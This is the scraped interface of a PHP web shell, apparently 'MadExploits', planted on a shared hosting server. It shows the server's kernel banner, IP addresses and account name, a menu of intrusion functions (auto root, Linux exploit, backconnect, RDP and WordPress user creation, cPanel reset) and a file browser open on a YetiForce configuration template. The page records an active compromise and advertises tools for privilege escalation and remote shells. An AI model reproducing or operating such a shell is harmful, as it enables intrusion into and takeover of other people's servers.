Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.135.206.229
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
yeti /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
Db.php
2.07
KB
-rw-r--r--
Main.php
4.65
KB
-rw-r--r--
clone.php
8.33
KB
-rw-r--r--
cron.sh
731
B
-rw-r--r--
csrf_secret.php
35
B
-rw-r--r--
extend.php
9.12
KB
-rw-r--r--
fileindex.php
388
B
-rw-r--r--
import.php
3.61
KB
-rw-r--r--
info.xml
4.6
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
20.19
KB
-rw-r--r--
install.xml
19.21
KB
-rw-r--r--
md5
1.96
KB
-rw-r--r--
notes.txt
1.04
KB
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
user_privileges_1.php
4.5
KB
-rw-r--r--
yeti.sql
1.48
MB
-rw-r--r--
yeti.zip
61.14
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Db.php
<?php /** * Configuration file. * This file is auto-generated. * * @package Config * * @copyright YetiForce S.A. * @license YetiForce Public License 7.0 (licenses/LicenseEN.txt or yetiforce.com) */ namespace Config; /** * Configuration file: Config\Db. */ class Db { /** Gets the database server */ public static $db_server = '[[softdbhost]]'; /** Gets the database port */ public static $db_port = '3306'; /** Gets the database user name */ public static $db_username = '[[softdbuser]]'; /** Gets the database password */ public static $db_password = '[[softdbpass]]'; /** Gets the database name */ public static $db_name = '[[softdb]]'; /** Gets the database type */ public static $db_type = 'mysql'; /** Gets the mongo database server */ public static $mongo_server = ''; /** Gets the mongo database port */ public static $mongo_port = ''; /** Gets the mongo database user name */ public static $mongo_username = ''; /** Gets the mongo database password */ public static $mongo_password = ''; /** Gets the mongo database name */ public static $mongo_name = ''; /** Gets the mongo database type */ public static $mongo_type = 'mongodb'; /** * Gets host name. */ public static function db_hostname() { return self::$db_server . ':' . self::$db_port; } /** * Basic database configuration. */ public static function base() { return [ 'dsn' => self::$db_type . ':host=' . self::$db_server . ';dbname=' . self::$db_name . ';port=' . self::$db_port, 'host' => self::$db_server, 'port' => self::$db_port, 'username' => self::$db_username, 'password' => self::$db_password, 'dbName' => self::$db_name, 'tablePrefix' => 'yf_', 'charset' => 'utf8', ]; } /** * Mongo database configuration. */ public static function mongo() { if (!self::$mongo_username) { return null; } return [ 'dsn' => sprintf('%s://%s:%s@%s:%d/%s', self::$mongo_type, urlencode(self::$mongo_username), urlencode(self::$mongo_password), self::$mongo_server, self::$mongo_port, self::$mongo_name), 'tablePrefix' => 'yf_', ]; } }
Close